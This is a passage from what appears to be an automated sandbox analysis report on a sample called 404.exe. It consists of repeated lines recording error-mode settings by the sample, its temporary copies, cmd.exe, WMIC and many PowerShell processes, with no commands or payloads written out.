            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
